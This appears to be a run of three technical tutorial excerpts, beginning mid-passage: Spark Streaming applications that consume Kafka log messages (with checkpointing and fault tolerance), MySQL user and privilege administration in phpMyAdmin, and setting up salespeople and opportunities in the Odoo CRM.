downloaded and placed in the lib folder of the directory structure given in Figure 4. It is being used in the submit.sh and the submitPy.sh scripts, which submit the application to the Spark cluster. The download URL for this jar file is given in the reference section of this chapter. In the submit.sh and submitPy.sh files, the last few lines contain a conditional statement looking for the second parameter value of 1 to identify this application and ship the required jar files to the Spark cluster. Implementing the application in Scala The following code snippet is the Scala code for the log event processing application that processes the messages produced by the Kafka producer. The use case of this application is the same as the one discussed in the preceding section concerning windowing operations: /** The following program can be compiled and run using SBT Wrapper scripts have been provided with this The following script can be run to compile the code ./compile.sh The following script can be used to run this application in Spark. The  second command line argument of value 1 is very important. 
This is to flag the shipping of the kafka jar files to the Spark cluster:
./submit.sh com.packtpub.sfb.KafkaStreamingApps 1
**/
package com.packtpub.sfb

import java.util.HashMap
import org.apache.spark.streaming._
import org.apache.spark.sql.{Row, SparkSession}
import org.apache.spark.streaming.kafka._
import org.apache.kafka.clients.producer.{ProducerConfig, KafkaProducer, ProducerRecord}

object KafkaStreamingApps {
  def main(args: Array[String]) {
    // Log level settings
    LogSettings.setLogLevels()
    // Variables used for creating the Kafka stream
    // The quorum of Zookeeper hosts
    val zooKeeperQuorum = "localhost"
    // Message group name
    val messageGroup = "sfb-consumer-group"
    // Kafka topics list separated by a comma if there are multiple topics to be listened on
    val topics = "sfb"
    // Number of threads per topic
    val numThreads = 1
    // Create the Spark Session and the spark context
    val spark = SparkSession
      .builder
      .appName(getClass.getSimpleName)
      .getOrCreate()
    // Get the Spark context from the Spark session for creating the streaming context
    val sc = spark.sparkContext
    // Create the streaming context
    val ssc = new StreamingContext(sc, Seconds(10))
    // Set the check point directory for saving the data to recover when there is a crash
    ssc.checkpoint("/tmp")
    // Create the map of topic names
    val topicMap = topics.split(",").map((_, numThreads.toInt)).toMap
    // Create the Kafka stream
    val appLogLines = KafkaUtils.createStream(ssc, zooKeeperQuorum, messageGroup, topicMap).map(_._2)
    // Count each log message line containing the word ERROR
    val errorLines = appLogLines.filter(line => line.contains("ERROR"))
    // Print the lines containing the error
    errorLines.print()
    // Count the number of messages by the windows and print them
    errorLines.countByWindow(Seconds(30), Seconds(10)).print()
    // Start the streaming
    ssc.start()
    // Wait till the application is terminated
    ssc.awaitTermination()
  }
}

Compared to the Scala code in the preceding section, the major difference is in the way the stream is created.

Implementing the application in Python

The following code snippet is the Python code for the log event processing application that processes the messages produced by the Kafka producer.
The use case of this application is also the same as the one discussed in the preceding section concerning windowing operations:

# The following script can be used to run this application in Spark
# ./submitPy.sh KafkaStreamingApps.py 1
from __future__ import print_function
import sys
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils

if __name__ == "__main__":
    # Create the Spark context
    sc = SparkContext(appName="PythonStreamingApp")
    # Necessary log4j logging level settings are done
    log4j = sc._jvm.org.apache.log4j
    log4j.LogManager.getRootLogger().setLevel(log4j.Level.WARN)
    # Create the Spark Streaming Context with 10 seconds batch interval
    ssc = StreamingContext(sc, 10)
    # Set the check point directory for saving the data to recover when there is a crash
    ssc.checkpoint("tmp")
    # The quorum of Zookeeper hosts
    zooKeeperQuorum = "localhost"
    # Message group name
    messageGroup = "sfb-consumer-group"
    # Kafka topics list separated by a comma if there are multiple topics to be listened on
    topics = "sfb"
    # Number of threads per topic
    numThreads = 1
    # Create a Kafka DStream
    kafkaStream = KafkaUtils.createStream(ssc, zooKeeperQuorum, messageGroup, {topics: numThreads})
    # Create the Kafka stream
    appLogLines = kafkaStream.map(lambda x: x[1])
    # Count each log message line containing the word ERROR
    errorLines = appLogLines.filter(lambda appLogLine: "ERROR" in appLogLine)
    # Print the first ten elements of each RDD generated in this DStream to the console
    errorLines.pprint()
    errorLines.countByWindow(30, 10).pprint()
    # Start the streaming
    ssc.start()
    # Wait till the application is terminated
    ssc.awaitTermination()

The following commands are run on the terminal window to run the Scala application:

$ cd Scala
$ ./submit.sh com.packtpub.sfb.KafkaStreamingApps 1

The following commands are run on the terminal window to run the Python application:

$ cd Python
$ ./submitPy.sh KafkaStreamingApps.py 1

When both of the preceding programs are running, whatever log event messages are typed into the console window of the Kafka console producer, invoked using the following command and inputs, will be processed by the application. The outputs of this program will be very similar to the ones given in the preceding section:

$ $KAFKA_HOME/bin/kafka-console-producer.sh --broker-list localhost:9092 --topic sfb
[Fri Dec 20 01:46:23 2015] [ERROR] [client 1.2.3.4.5.6] Directory index forbidden by rule: /home/raj/
[Fri Dec 20 01:46:23 2015] [WARN] [client 1.2.3.4.5.6] Directory index forbidden by rule: /home/raj/
[Fri Dec 20 01:54:34 2015] [ERROR] [client 1.2.3.4.5.6] Directory index forbidden by rule: /apache/web/test

Spark provides two approaches to process Kafka streams. The first one is the receiver-based approach that was discussed previously, and the second one is the direct approach. The direct approach to processing Kafka messages is a simplified method in which Spark Streaming uses all the capabilities of Kafka just like any Kafka topic consumer, and polls for the messages in a specific topic and partition by the offset number of the messages. Depending on the batch interval of the Spark Streaming data processing application, it picks up a certain number of offsets from the Kafka cluster, and this range of offsets is processed as a batch. This is highly efficient and ideal for processing messages with a requirement to have exactly-once processing.
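The article does not include code for the direct approach, so the following is a minimal, hedged sketch (not from the original text) of how the Python application above could be adapted to it. It assumes the same broker (localhost:9092) and topic (sfb) used earlier, with the spark-streaming-kafka-0-8 jar on the classpath; only the stream-creation call changes, and the rest of the processing pipeline stays the same:

```python
# A hedged sketch of the direct (receiver-less) approach, not taken from the book.
# It assumes the same broker (localhost:9092) and topic (sfb) used earlier.
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils

sc = SparkContext(appName="PythonStreamingDirectApp")
ssc = StreamingContext(sc, 10)

# createDirectStream talks to the Kafka brokers directly and tracks offsets itself,
# so no Zookeeper quorum or receiver threads are involved
directStream = KafkaUtils.createDirectStream(
    ssc,
    ["sfb"],
    {"metadata.broker.list": "localhost:9092"})

# Each element is a (key, value) tuple; the log line is the value
appLogLines = directStream.map(lambda x: x[1])
errorLines = appLogLines.filter(lambda line: "ERROR" in line)
errorLines.pprint()

ssc.start()
ssc.awaitTermination()
```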
This method also reduces the Spark Streaming library's need to do additional work to implement the exactly-once semantics of message processing, and delegates that responsibility to Kafka. The programming constructs of this approach are slightly different in the APIs used for the data processing. Consult the appropriate reference material for the details.

The preceding sections introduced the concept of the Spark Streaming library and discussed some real-world use cases. From a deployment perspective, there is a big difference between Spark data processing applications developed to process static batch data and those developed to process dynamic stream data. The availability of data processing applications that process a stream of data must be constant. In other words, such applications should not have components that are single points of failure. The following section is going to discuss this topic.

Spark Streaming jobs in production

When a Spark Streaming application is processing the incoming data, it is very important to have uninterrupted data processing capability so that all the data that is getting ingested is processed. In business-critical streaming applications, missing even one piece of data can have a huge business impact. To deal with such situations, it is important to avoid single points of failure in the application infrastructure. From a Spark Streaming application perspective, it is good to understand how the underlying components in the ecosystem are laid out so that appropriate measures can be taken to avoid single points of failure.

A Spark Streaming application deployed in a cluster managed by Hadoop YARN, Mesos, or Spark Standalone mode has two main components, very similar to any other type of Spark application:

- Spark driver: This contains the application code written by the user
- Executors: The executors that execute the jobs submitted by the Spark driver

But the executors have an additional component called a receiver that receives the data getting ingested as a stream and saves it as blocks of data in memory. When one receiver is receiving the data and forming the data blocks, they are replicated to another executor for fault tolerance. In other words, in-memory replication of the data blocks is done onto a different executor. At the end of every batch interval, these data blocks are combined to form a DStream and sent out for further processing downstream.

Figure 1 depicts the components working together in a Spark Streaming application infrastructure deployed in a cluster. In Figure 1, there are two executors. The receiver component is deliberately not displayed in the second executor to show that it is not using the receiver and instead just collects the replicated data blocks from the other executor. But when needed, such as on the failure of the first executor, the receiver in the second executor can start functioning.

Implementing fault-tolerance in Spark Streaming data processing applications

Spark Streaming data processing application infrastructure has many moving parts. Failures can happen to any one of them, resulting in the interruption of the data processing. Typically, failures happen to the Spark driver or the executors. When an executor fails, since the replication of data happens on a regular basis, the task of receiving the data stream is taken over by the executor onto which the data was being replicated. There is, however, a situation in which an executor fails and all the data that is yet to be processed is lost.
To circumvent this problem, there is a way to persist the data blocks into HDFS or Amazon S3 in the form of write-ahead logs. When the Spark driver fails, the driver program is stopped, all the executors lose connection, and they stop functioning. This is the most dangerous situation. To deal with this situation, some configuration and code changes are necessary. The Spark driver has to be configured to have an automatic driver restart, which is supported by the cluster managers. This includes a change in the Spark job submission method to use the cluster mode of whichever cluster manager is being used. When a restart of the driver happens, to start from the place where it crashed, a checkpointing mechanism has to be implemented in the driver program. This has already been done in the code samples that are used. The following lines of code do that job:

ssc = StreamingContext(sc, 10)
ssc.checkpoint("tmp")

From an application coding perspective, the way the StreamingContext is created is slightly different. Instead of creating a new StreamingContext every time, the factory method getOrCreate of the StreamingContext is to be used with a function, as shown in the following code segment. If that is done, when the driver is restarted, the factory method will check the checkpoint directory to see whether an earlier StreamingContext was in use and, if found in the checkpoint data, it is recreated. Otherwise, a new StreamingContext is created. The following code snippet gives the definition of a function that can be used with the getOrCreate factory method of the StreamingContext. As mentioned earlier, a detailed treatment of these aspects is beyond the scope of this book:

/**
* The following function has to be used when the code is being restructured to have checkpointing and driver recovery
* The way it should be used is to use the StreamingContext.getOrCreate with this function and do a start of that
*/
def sscCreateFn(): StreamingContext = {
  // Variables used for creating the Kafka stream
  // The quorum of Zookeeper hosts
  val zooKeeperQuorum = "localhost"
  // Message group name
  val messageGroup = "sfb-consumer-group"
  // Kafka topics list separated by a comma if there are multiple topics to be listened on
  val topics = "sfb"
  // Number of threads per topic
  val numThreads = 1
  // Create the Spark Session and the spark context
  val spark = SparkSession
    .builder
    .appName(getClass.getSimpleName)
    .getOrCreate()
  // Get the Spark context from the Spark session for creating the streaming context
  val sc = spark.sparkContext
  // Create the streaming context
  val ssc = new StreamingContext(sc, Seconds(10))
  // Create the map of topic names
  val topicMap = topics.split(",").map((_, numThreads.toInt)).toMap
  // Create the Kafka stream
  val appLogLines = KafkaUtils.createStream(ssc, zooKeeperQuorum, messageGroup, topicMap).map(_._2)
  // Count each log message line containing the word ERROR
  val errorLines = appLogLines.filter(line => line.contains("ERROR"))
  // Print the lines containing the error
  errorLines.print()
  // Count the number of messages by the windows and print them
  errorLines.countByWindow(Seconds(30), Seconds(10)).print()
  // Set the check point directory for saving the data to recover when there is a crash
  ssc.checkpoint("/tmp")
  // Return the streaming context
  ssc
}

At a data source level, it is a good idea to build in parallelism for faster data processing and, depending on the source of data, this can be accomplished in different ways.
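Before moving on to source-level parallelism, here is a minimal, hedged sketch (in Python, and not taken from the book) of how the pieces described above fit together: a checkpoint-aware setup function, the StreamingContext.getOrCreate call, and the write-ahead log setting. The checkpoint path and application name are placeholders. For automatic driver restart, the application would additionally be submitted in cluster mode (for example, with --deploy-mode cluster, plus --supervise when using Spark Standalone):

```python
# A hedged sketch of driver-recovery wiring, assuming the receiver-based Kafka stream
# used earlier; the checkpoint path and names are placeholders.
from pyspark import SparkConf, SparkContext
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils

CHECKPOINT_DIR = "hdfs:///tmp/sfb-checkpoint"  # assumed checkpoint location

def create_streaming_context():
    # Enable write-ahead logs so received blocks are also persisted alongside the checkpoints
    conf = (SparkConf()
            .setAppName("KafkaStreamingRecoverableApp")
            .set("spark.streaming.receiver.writeAheadLog.enable", "true"))
    sc = SparkContext(conf=conf)
    ssc = StreamingContext(sc, 10)
    ssc.checkpoint(CHECKPOINT_DIR)

    kafkaStream = KafkaUtils.createStream(
        ssc, "localhost", "sfb-consumer-group", {"sfb": 1})
    appLogLines = kafkaStream.map(lambda x: x[1])
    errorLines = appLogLines.filter(lambda line: "ERROR" in line)
    errorLines.pprint()
    return ssc

# On a fresh start this calls create_streaming_context(); after a driver restart
# it rebuilds the context from the checkpoint data instead
ssc = StreamingContext.getOrCreate(CHECKPOINT_DIR, create_streaming_context)
ssc.start()
ssc.awaitTermination()
```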
Kafka inherently supports partitioning at the topic level, and that kind of scaling-out mechanism supports a good amount of parallelism. As a consumer of Kafka topics, the Spark Streaming data processing application can have multiple receivers by creating multiple streams, and the data generated by those streams can be combined by the union operation on the Kafka streams. The production deployment of Spark Streaming data processing applications should be done purely based on the type of application being deployed. Some of the guidelines given previously are just introductory and conceptual in nature. There is no silver bullet approach to solving production deployment problems, and they have to evolve along with the application development. To summarize, we looked at the production deployment of Spark Streaming data processing applications and the possible ways of implementing fault tolerance in Spark Streaming data processing applications using Kafka. To explore more critical and equally important Spark tools such as Spark GraphX, Spark MLlib, and DataFrames, do check out Apache Spark 2 for Beginners to develop efficient large-scale applications with Apache Spark.
Administrating the MySQL Server with phpMyAdmin

Packt, 13 Oct 2010
Mastering phpMyAdmin 3.3.x for Effective MySQL Management: a complete guide to get started with phpMyAdmin 3.3 and master its features.

- The best introduction to phpMyAdmin available
- Written by the project leader of phpMyAdmin, and improved over several editions
- A step-by-step tutorial for manipulating data with phpMyAdmin
- Learn to do things with your MySQL database and phpMyAdmin that you didn't know were possible!

Managing users and their privileges

The Privileges subpage (visible only if we are logged in as a privileged user) contains dialogs to manage MySQL user accounts. It also contains dialogs to manage privileges on the global, database, and table levels. This subpage is hierarchical. For example, when editing a user's privileges, we can see the global privileges as well as the database-specific privileges. We can then go deeper to see the table-specific privileges for this database-user combination.

The user overview

The first page displayed when we enter the Privileges subpage is called User overview. This shows all user accounts and a summary of their global privileges, as shown in the next screenshot. From this page, we can:

- Edit a user's privileges, via the Edit link for this user
- Use the checkboxes to remove users, via the Remove selected users dialog
- Access the page where the Add a new User dialog is available

The displayed users' list has columns with the following characteristics:

Privileges reload

At the bottom of the User overview page, the following message is displayed:

Note: phpMyAdmin gets the users' privileges directly from MySQL's privilege tables. The content of these tables may differ from the privileges the server uses, if they have been changed manually. In this case, you should reload the privileges before you continue.

Here, the text reload the privileges is clickable. The effective privileges (the ones against which the server bases its access decisions) are the privileges that are located in the server's memory. Privilege modifications that are made from the User overview page are made both in memory and on disk, in the mysql database. Modifications made directly to the mysql database do not have an immediate effect. The reload the privileges operation reads the privileges from the database and makes them effective in memory.

Adding a user

The Add a new User link opens a dialog for user account creation. First, we see the panel where we'll describe the account itself. The second part of the Add a new User dialog is where we'll specify the user's global privileges, which apply to the server as a whole.

Entering the username

The User name menu offers two choices. Firstly, we can choose Use text field and enter a username in the box, or we can choose Any user to create an anonymous user (the blank user). Let's choose Use text field and enter bill.

Assigning a host value

By default, this menu is set to Any host, with % as the host value. The Local choice means "localhost". The Use host table choice (which creates a blank value in the host field) means to look in the mysql.hosts table for database-specific privileges. Choosing Use text field allows us to enter the exact host value we want. Let's choose Local.

Setting passwords

Even though it's possible to create a user without a password (by selecting the No password option), it's best to have a password. We have to enter it twice (as we cannot see what is entered) to confirm the intended password.
A secure password should have more than eight characters, and should contain a mixture of uppercase and lowercase characters, digits, and special characters. Therefore, it's recommended to have phpMyAdmin generate a password—this is possible in JavaScript-enabled browsers. In the Generate Password dialog, clicking on Generate enters a random password (in clear text) on the screen and fills the Password and Re-type input fields with the generated password. At this point, we should note the password so that we can pass it on to the user. Understanding rights for database creation A frequent convention is to assign a user the rights to a database having the same name as this user. To accomplish this, the Database for user section offers the checkbox Create database with same name and grant all privileges. Selecting this checkbox automates the process by creating both the database (if it does not already exist) and the corresponding rights. Please note that, with this method, each user would be limited to one database (user bill, database bill). Another possibility is to allow users to create databases that have the same prefix as their usernames. Therefore, the other choice, Grant all privileges on wildcard name (username_%), performs this function by assigning a wildcard privilege. With this in place, user bill could create the databases bill_test, bill_2, bill_payroll, and so on; phpMyAdmin does not pre-create the databases in this case. Assigning global privileges Global privileges determine the user's access to all databases. Hence, these are sometimes known as "superuser privileges". A normal user should not have any of these privileges unless there is a good reason for this. Of course, if we are really creating a superuser, we will select every global privilege that he or she needs. These privileges are further divided into Data, Structure, and Administration groups. In our example, bill will not have any global privileges. Limiting the resources used We can limit the resources used by this user on this server (for example, the maximum queries per hour). Zero means no limit. We will not impose any resource limits on bill. The following screenshot shows the status of the screen just before hitting Go to create this user's definition (with the remaining fields being set to default): Editing a user profile The page used to edit a user's profile appears after a user's creation, or whenever we click on Edit for a user in the User overview page. There are four sections on this page, each with its own Go button. Hence, each section is operated independently and has a distinct purpose. Editing privileges The section for editing the user's privileges has the same look as the Add a new User dialog, and is used to view and change global privileges. Assigning database-specific privileges In this section, we define the databases to which our user has access, and his or her exact privileges on these databases. As shown in the previous screenshot, we see None because we haven't defined any privileges yet. There are two ways of defining database privileges. First, we can choose one of the existing databases from the drop-down menu: This assigns privileges only for the chosen database. We can also choose Use text field and enter a database name. We could enter a non-existent database name, so that the user can create it later (provided that we give him or her the CREATE privilege in the next panel). We can also use special characters, such as the underscore and the percent sign, for wildcards. 
For example, entering bill here would enable him to create a bill database, and entering bill% would enable him to create a database with any name that starts with bill. For our example, we will enter bill and then click on Go. The next screen is used to set bill's privileges on the bill database, and create table-specific privileges. To learn more about the meaning of a specific privilege, we can move the mouse over a privilege name (which is always in English), and an explanation about this privilege appears in the current language. We give SELECT, INSERT, UPDATE, DELETE, CREATE, ALTER, INDEX, and DROP privileges to bill on this database. We then click on Go. After the privileges have been assigned, the interface stays at the same place, so that we can refine these privileges further. We cannot assign table-specific privileges for the moment, as the database does not yet exist. To go back to the general privileges page of bill, click on the 'bill'@'localhost' title. This brings us back to the following, familiar page, except for a change in one section: We see the existing privileges (which we can Edit or Revoke) on the bill database for user bill, and we can add privileges for bill on another database. We can also see that bill has no table-specific privileges on the bill database. Changing the password The Change password dialog is part of the Edit user page, and we can use it either to change bill's password or to remove it. Removing the password will enable bill to login without a password. The dialog offers a choice of password hashing options, and it's recommended to keep the default of MySQL 4.1+ hashing. For more details about hashing, please visit http://dev.mysql.com/doc/refman/5.1/en/password-hashing.html
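The phpMyAdmin dialogs described above ultimately issue ordinary SQL statements against the server. For readers who prefer to script the same user and privilege setup, the following is a minimal, hedged sketch (not part of the original article) that uses Python's mysql-connector package; the host, administrator credentials, and generated password are placeholders, and the GRANT list mirrors the privileges given to bill above:

```python
# A hedged sketch: create the user bill@localhost and grant the same database-level
# privileges assigned through phpMyAdmin above. Credentials and password are placeholders.
import mysql.connector

admin = mysql.connector.connect(host="localhost", user="root", password="admin-password")
cursor = admin.cursor()

# Equivalent of the Add a new User dialog
cursor.execute("CREATE USER 'bill'@'localhost' IDENTIFIED BY 'a-generated-password'")

# Equivalent of the database-specific privileges panel for the bill database
cursor.execute(
    "GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, ALTER, INDEX, DROP "
    "ON `bill`.* TO 'bill'@'localhost'")

# Equivalent of the "reload the privileges" link (only strictly needed after
# editing the grant tables directly)
cursor.execute("FLUSH PRIVILEGES")

cursor.close()
admin.close()
```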
Implement an effective CRM system in Odoo 11 [Tutorial]

Sugandha Lahoti, 18 Jul 2018
Until recently, most business and financial systems had product-focused designs while records and fields maintained basic customer information, processes, and reporting typically revolved around product-related transactions. In the past, businesses were centered on specific products, but now the focus has shifted to center the business on the customer. The Customer Relationship Management (CRM) system provides the tools and reporting necessary to manage customer information and interactions. In this article, we will take a look at what it takes to implement a CRM system in Odoo 11 as part of an overall business strategy. We will also install the CRM application and setup salespersons that can be assigned to our customers. This article is an excerpt from the book, Working with Odoo 11 - Third Edition by Greg Moss. In this book, you will learn to configure, manage, and customize your Odoo system. Using CRM as a business strategy It is critical that the sales people share account knowledge and completely understand the features and capabilities of the system. They often have existing tools that they have relied on for many years. Without clear objectives and goals for the entire sales team, it is likely that they will not use the tool. A plan must be implemented to spend time training and encouraging the sharing of knowledge to successfully implement a CRM system. Installing the CRM application If you have not installed the CRM module, log in as the administrator and then click on the Apps menu. In a few seconds, the list of available apps will appear. The CRM will likely be in the top-left corner: Click on Install to set up the CRM application. Look at the CRM Dashboard Like with the installation of the Sales application, Odoo takes you to the Discuss menu. Click on Sales to see the new changes after installing the CRM application. New to Odoo 10 is an improved CRM Dashboard that provides you a friendly welcome message when you first install the application. You can use the dashboard to get an overview of your sales pipelines and get easy access to the most common actions within CRM. Assigning the sales representative or account manager In Odoo 10, like in most CRM systems, the sales representative or account manager plays an important role. Typically, this is the person that will ultimately be responsible for the customer account and a satisfactory customer experience. While most often a company will use real people as their salespeople, it is certainly possible to instead have a salesperson record refer to a group, or even a sub-contracted support service. We will begin by creating a salesperson that will handle standard customer accounts. Note that a sales representative is also a user in the Odoo system. Create a new salesperson by going to the Settings menu, selecting Users, and then clicking the Create button. The new user form will appear. We have filled in the form with values for a fictional salesperson, Terry Zeigler. The following is a screenshot of the user's Access Rights tab: Specifying the name of the user You specify the username. Unlike some systems that provide separate first name and last name fields, with Odoo you specify the full name within a single field. Email address Beginning in Odoo 9, the user and login form prompts for email as opposed to username. This practice has continued in Odoo version 10 as well. 
It is still possible to use a user name instead of email address, but given the strong encouragement to use email address in Odoo 9 and Odoo 10, it is possible that in future versions of Odoo the requirement to provide an email address may be more strictly enforced. Access Rights The Access Rights tab lets you control which applications the user will be able to access. By default, Odoo will specify Mr.Ziegler as an employee so we will accept that default. Depending on the applications you may have already installed or dependencies Odoo may add in various releases, it is possible that you will have other Access Rights listed. Sales application settings When setting up your sales people in Odoo 10, you have three different options on how much access an individual user has to the sales system: User: Own Documents Only This is the most restrictive access to the sales application. A user with this access level is only allowed to see the documents they have entered themselves or which have been assigned to them. They will not be able to see Leads assigned to other salespeople in the sales application. User: All Documents With this setting, the user will have access to all documents within the sales application. Manager The Manager setting is the highest access level in the Odoo sales system. With this access level, the user can see all Leads as well as access the configuration options of the sales application. The Manager setting also allows the user to access statistical reports. We will leave the Access Rights options unchecked. These are used when working with multiple companies or with multiple currencies. The Preferences tab consists of the following options: Language and Timezone Odoo allows you to select the language for each user. Currently, Odoo supports more than 20 language translations. Specifying the Timezone field allows Odoo to coordinate the display of date and time on messages. Leaving Timezone blank for a user will sometimes lead to unpredictable behavior in the Odoo software. Make sure you specify a timezone when creating a user record. Email Messages and Notifications In Odoo 7, messaging became a central component of the Odoo system. In version 10, support has been improved and it is now even easier to communicate important sales information between colleagues. Therefore, determining the appropriate handling of email, and circumstances in which a user will receive email, is very important. The Email Messages and Notifications option lets you determine when you will receive email messages from notifications that come to your Odoo inbox. For our example, we have chosen All Messages. This is now the new default setting in Odoo 10. However, since we have not yet configured an email server, or if you have not configured an email server yourself, no emails will be sent or received at this stage. Let's review the user options that will be available in communicating by email. Never: Selecting Never suppresses all email messaging for the user. Naturally, this is the setting you will wish to use if you do not have an email server configured. This is also a useful option for users that simply want to use the built-in inbox inside Odoo to retrieve their messages. All Messages (discussions, emails, followed system notifications): This option sends an email notification for any action that would create an entry in your Odoo inbox. Unlike the other options, this action can include system notifications or other automated communications. 
Signature The Signature section allows you to customize the signature that will automatically be appended to Odoo-generated messages and emails. Manually setting the user password You may have noticed that there is no visible password field in the user record. That is because the default method is to email the user an account verification they can use to set their password. However, if you do not have an email server configured, there is an alternative method for setting the user password. After saving the user record, use the Change Password button at the top of the form. A form will then appear allowing you to set the password for the user. Now in Odoo 10, there is a far more visible button available at the top left of the form. Just click the Change Password button. Assigning a salesperson to a customer Now that we have set up our salesperson, it is time to assign the salesperson their first customer. Previously, no salesperson had been assigned to our one and only customer, Mike Smith. So let's go to the Sales menu and then click on Mike Smith to pull up his customer record and assign him Terry Ziegler as his salesperson. The following screenshot is of the customer screen opened to assign a salesperson: Here, we have set the sales person to Terry Zeigler. By assigning your customers a salesperson, you can then better organize your customers for reports and additional statistical analysis. Understanding Your Pipeline Prior to Odoo 10, the CRM application primarily was a simple collection of Leads and opportunities. While Odoo still uses both Leads and opportunities as part of the CRM application, the concept of a Pipeline now takes center stage. You use the Pipeline to organize your opportunities by what stage they are within your sales process. Click on Your Pipeline in the Sales menu to see the overall layout of the Pipeline screen: In the preceding Pipeline forms, one of the first things to notice is that there are default filters applied to the view. Up in the search box, you will see that there is a filter to limit the records in this view to the Direct Sales team as well as a My Opportunities filter. This effectively limits the records so you only see your opportunities from your primary sales team. Removing the My Opportunities filter will allow you to see opportunities from other salespeople in your organization. Creating new opportunity In Odoo 10, a potential sale is defined by creating a new opportunity. An opportunity allows you to begin collecting information about the scope and potential outcomes for a sale. These opportunities can be created from new Leads, or an opportunity can originate from an existing customer. For our real-world example, let's assume that Mike Smith has called and was so happy with his first order that he now wants to discuss using Silkworm for his local sports team. After a short conversation we decide to create an opportunity by clicking the Create button. You can also use the + buttons within any of the pipeline stages to create an opportunity that is set to that stage in the pipeline. In Odoo 10, the CRM application greatly simplified the form for entering a new opportunity. Instead of bringing up the entire opportunity form with all the fields you get a simple form that collects only the most important information. The following screenshot is of a new opportunity form: Opportunity Title The title of your opportunity can be anything you wish. It is naturally important to choose a subject that makes it easy to identify the opportunity in a list. 
This is the only field required to create an opportunity in Odoo 10. Customer This field is automatically populated if you create an opportunity from the customer form. You can, however, assign a different customer if you like. This is not a required field, so if you have an opportunity that you do not wish to associate with a customer, that is perfectly fine. For example, you may leave this field blank if you are attending a trade show and expect to have revenue, but do not yet have any specific customers to attribute to the opportunity. Expected revenue Here, you specify the amount of revenue you can expect from the opportunity if you are successful. Inside the full opportunity form there is a field in which you can specify the percentage likelihood that an opportunity will result in a sale. These values are useful in many statistical reports, although they are not required to create an opportunity. Increasingly, more reports look to expected revenue and percentage of opportunity completions. Therefore, depending on your reporting requirements you may wish to encourage sales people to set target goals for each opportunity to better track conversion. Rating Some opportunities are more important than others. You can choose none, one, two, or three stars to designate the relative importance of this opportunity. Introduction to sales stages At the top of the Kanban view, you can see the default stages that are provided by an Odoo CRM installation. In this case, we see New, Qualified, Proposition, and Won. As an opportunity moves between stages, the Kanban view will update to show you where each opportunity currently stands. Here, we can see because this Sports Team Project has just been entered in the New column. Viewing the details of an opportunity If you click the three lines at the top right of the Sports Team Project opportunity in the Kanban view, which appears when you hover the mouse over it, you will see a pop-up menu with your available options. The following screenshot shows the available actions on an opportunity: Actions you can take on an opportunity Selecting the Edit option takes you to the opportunity record and into edit mode for you to change any of the information. In addition, you can delete the record or archive the record so it will no longer appear in your pipeline by default. The color palette at the bottom lets you color code your opportunities in the Kanban view. The small stars on the opportunity card allow you to highlight opportunities for special consideration. You can also easily drag and drop the opportunity into other columns as you work through the various stages of the sale. Using Odoo's OpenChatter feature One of the biggest enhancements brought about in Odoo 7 and expanded on in later versions of Odoo was the new OpenChatter feature that provides social networking style communication to business documents and transactions. As we work our brand new opportunity, we will utilize the OpenChatter feature to demonstrate how to communicate details between team members and generate log entries to document our progress. The best thing about the OpenChatter feature is that it is available for nearly all business documents in Odoo. It also allows you to see a running set of logs of the transactions or operations that have affected the document. This means everything that applies here to the CRM application can also be used to communicate in sales and purchasing, or in communicating about a specific customer or vendor. 
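Before moving on, a brief aside for readers who prefer to script record creation: opportunities like the one created above can also be inserted through Odoo's external XML-RPC API. The following is a minimal, hedged sketch that is not part of the original tutorial; the server URL, database name, and credentials are placeholders, and the model and field names (crm.lead, planned_revenue, and so on) follow common Odoo conventions but may differ between Odoo versions:

```python
# A hedged sketch: create an opportunity over Odoo's external XML-RPC API.
# URL, database, and credentials are placeholders; model and field names are
# assumptions based on standard Odoo conventions and may vary by version.
import xmlrpc.client

URL, DB, USER, PASSWORD = "http://localhost:8069", "odoo-db", "admin", "admin"

common = xmlrpc.client.ServerProxy(URL + "/xmlrpc/2/common")
uid = common.authenticate(DB, USER, PASSWORD, {})

models = xmlrpc.client.ServerProxy(URL + "/xmlrpc/2/object")

# Mirror the fields filled in on the simplified opportunity form
opportunity_id = models.execute_kw(DB, uid, PASSWORD, "crm.lead", "create", [{
    "name": "Sports Team Project",   # Opportunity Title
    "type": "opportunity",           # distinguishes an opportunity from a plain lead
    "planned_revenue": 5000.0,       # Expected revenue (illustrative figure)
}])
print("Created opportunity with id", opportunity_id)
```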
Changing the status of an opportunity For our example, let's assume that we have prepared our proposal and made the presentation. Bring up the opportunity by using the right-click Menu in the Kanban view or going into the list view and clicking the opportunity in the list. It is time to update the status of our opportunity by clicking the Proposition arrow at the top of the form: Notice that you do not have to edit the record to change the status of the opportunity. At the bottom of the opportunity, you will now see a logged note generated by Odoo that documents the changing of the opportunity from a new opportunity to a proposition. The following screenshot is of OpenChatter displaying a changed stage for the opportunity: Notice how Odoo is logging the events automatically as they take place. Managing the opportunity With the proposal presented, let's take down some details from what we have learned that may help us later when we come back to this opportunity. One method of collecting this information could be to add the details to the Internal Notes field in the opportunity form. There is value, however, in using the OpenChatter feature in Odoo to document our new details. Most importantly, using OpenChatter to log notes gives you a running transcript with date and time stamps automatically generated. With the Generic Notes field, it can be very difficult to manage multiple entries. Another major advantage is that the OpenChatter feature can automatically send messages to team members' inboxes updating them on progress. let's see it in action! Click the Log an Internal note link to attach a note to our opportunity. The following screenshot is for creating a note: The activity option is unique to the CRM application and will not appear in most documents. You can use the small icons at the bottom to add a smiley, attach a document, or open up a full featured editor if you are creating a long note. The full featured editor also allows you to save templates of messages/notes you may use frequently. Depending on your specific business requirements, this could be a great time saver. When you create a note, it is attached to the business document, but no message will be sent to followers. You can even attach a document to the note by using the Attach a File feature. After clicking the Log button, the note is saved and becomes part of the OpenChatter log for that document. Following a business document Odoo brings social networking concepts into your business communication. Fundamental to this implementation is that you can get automatic updates on a business document by following the document. Then, whenever there is a note, action, or a message created that is related to a document you follow, you will receive a message in your Odoo inbox. In the bottom right-hand corner of the form, you are presented with the options for when you are notified and for adding or removing followers from the document. The following screenshot is of the OpenChatter follow options: In this case, we can see that both Terry Zeigler and Administrator are set as followers for this opportunity. The Following checkbox at the top indicates that I am following this document. Using the Add Followers link you can add additional users to follow the document. The items followers are notified are viewed by clicking the arrow to the right of the following button. 
